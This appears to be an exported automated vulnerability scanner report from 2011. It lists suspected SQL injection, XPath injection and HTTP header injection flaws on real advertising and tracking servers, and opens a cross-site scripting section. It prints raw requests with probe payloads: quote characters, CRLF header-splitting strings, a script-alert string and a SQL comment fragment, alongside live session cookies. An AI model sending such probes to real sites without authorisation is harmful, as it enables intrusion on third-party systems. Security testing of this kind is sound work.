Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US12592570'%20or%201%3d2--%20; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEzMC4xLjEuaTI6MTAzLjQuMS5pNjoxNzEuMS4wOjQ4LjEuMDo5OC42LjQ6MTQyLjAuMC5pNDoyMDAuMC4wOjE5OC4wLjA6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4wLjAuaTF8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:01 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>
1.23. http://www.revresda.com/event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131794&AdID=260643&TargetID=62091&Segments=65,3522,3724,4354,4979,5788,7409,8303,8427,8773,11672,12591,22067,22782,24028,26273,27371,30359,34504,38844,38860,39489,39804,41374,41375,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58777,58865,58980,59407,59626,59629,59841,60715,61547,61548,61677,61817,62031,62093,62466,62910,63592,63927,64040&Targets=4897,9413,41261,42842,42841,62091&Values=60,80,92,101,138,194,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:28 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8

1.24. http://www.revresda.com/event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.revresda.com
Path:   /event.ng/Type=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 03 Oct 2011 00:37:26 GMT
Server: Apache/2.2.3 (CentOS)
ntCoent-Length: 617
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 617

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=click&FlightID=131795&AdID=260698&TargetID=63940&Segments=65,3522,3724,4354,4979,7409,8303,8773,11672,12591,22067,22782,24028,26276,27371,30286,30359,30533,34504,38844,38860,39489,39804,41374,41375,42628,45767,47055,47463,48051,49210,49979,50264,50404,51152,51416,53235,57106,57111,58401,58758,58784,58865,59407,59626,59629,59841,60715,61547,61548,61677,61817,61818,62031,62093,62139,62324,62466,62910,63590,63592,63615,63927,64040&Targets=4897,41261,42842,42841,63940&Values=60,80,92,101,138,195,216,264,32876,33113,33155,33227,33232,34014,34137,34581,34634,35048,35052,35065,35586,35793,35924,41054,66797,67440,68027,68032,68295,68362,68366,68375,96177,96189,103024,103078,103080,103453,103455&RawValues=NGUSERID%2Caeb2623-25195-1628532852-6&Redirect=http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response 2

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 00:37:27 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: max-age=0
Content-Length: 0
Cache-control: no-cache
Location: http://www.trip.com/index.html?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Content-Type: text/html; charset=UTF-8

2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The put_2101 cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the put_2101 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /a/7743/12359/21900-15.js?cb=0.14229151024483144 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1'; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; rdk=7743/12359; rdk2=0; ses2=13378^2&12566^2&12359^1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:29 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 01:00:29 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^3&12566^2&12359^68; expires=Tue, 04-Oct-2011 04:59:59 GMT; max-age=115170; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
et/adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDsOhDAMBa.CXG8kEjv.7G1iCBWio1rt3bGpPCM9zw8Q4buYUrXPAthCVDo1Dash4OtwZrNCm4xCenixbVjZlX2XOetsDvmaY.ltlbTsZLDHRX5rFHjd5xnIgbUTivwfI_ccIA--&redirectURL=;ord=b0ab6699-4c7a-48fb-9ca9-d86bd7ee1e2b?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSP
...[SNIP]...
3. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 941ce%0d%0af56167da7a4 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikefootballglobal%2Cnikeall%2F1%2FH.22.1%2Fs93092863939236%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D27447D5405012A65-6000010FA00F4A54%26%26ndh%3D1%26t%3D2%252F9%252F2011%252018%253A58%253A28%25200%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLSC%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnikefootball%252Flanguage_tunnel%253Flid%253Dnikebutton%26r%3Dhttp%253A%252F%252Fwww.manutd.com%252FSearch-Results.aspx%253Fqs%253Dmanutd_frontend%2526catTxt%253D%2526searchText%253Dxss75931%25253Cscript%25253Ealert%28document.location%29%25253C%252Fscript%25253E14fb8fbf954%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dsoccer%26server%3Dnikefootballglobal%26events%3Devent13%26v5%3DD%253DUser-Agent%26c18%3Dlanguage_selector%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1074%26bh%3D906%26p%3DShockwave%2520Flash%253BQuickTime%2520Plug-in%25207.7%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BSilverlight%2520Plug-In%253BMicrosoft%2520Office%25202010%253BRemoting%2520Viewer%253BNative%2520Client%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Earth%2520Plugin%253BGoogle%2520Updater%253BGoogle%2520Update%253BiTunes%2520Application%2520Detector%253BWPI%2520Detector%25201.4%253BDefault%2520Plug-in%253B%26AQE%3D1941ce%0d%0af56167da7a4&A2S=1;ord=1732731727 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikefootballglobal,nikeall/1/H.22.1/s93092863939236?AQB=1&vvpr=true&&pccr=true&vidn=27447D5405012A65-6000010FA00F4A54&&ndh=1&t=2%2F9%2F2011%2018%3A58%3A28%200%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLSC%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnikefootball%2Flanguage_tunnel%3Flid%3Dnikebutton&r=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=soccer&server=nikefootballglobal&events=event13&v5=D%3DUser-Agent&c18=language_selector&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1941ce
f56167da7a4&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1317599960:
Date: Sun, 02 Oct 2011 23:59:20 GMT
Server: GFE/2.0
Content-Type: text/html

3.2. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap [476949646137654800&c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kantarmedia.guardian.co.uk
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the 476949646137654800&c request parameter is copied into the Set-Cookie response header. The payload 958bb%0d%0aa655d8051a4 was submitted in the 476949646137654800&c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?476949646137654800&c=958bb%0d%0aa655d8051a4&e=14d HTTP/1.1
Host: kantarmedia.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html?054612530__!__http://kantarmedia.guardian.co.uk__!__&Paneled_Site=guardian.co.uk&Paneled_Section=football
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:52:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 958bb
a655d8051a4=0; expires=Sun, 16-Oct-11 23:52:08 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

4. Cross-site scripting (reflected)  previous  next
There are 435 instances of this issue:

Issue background

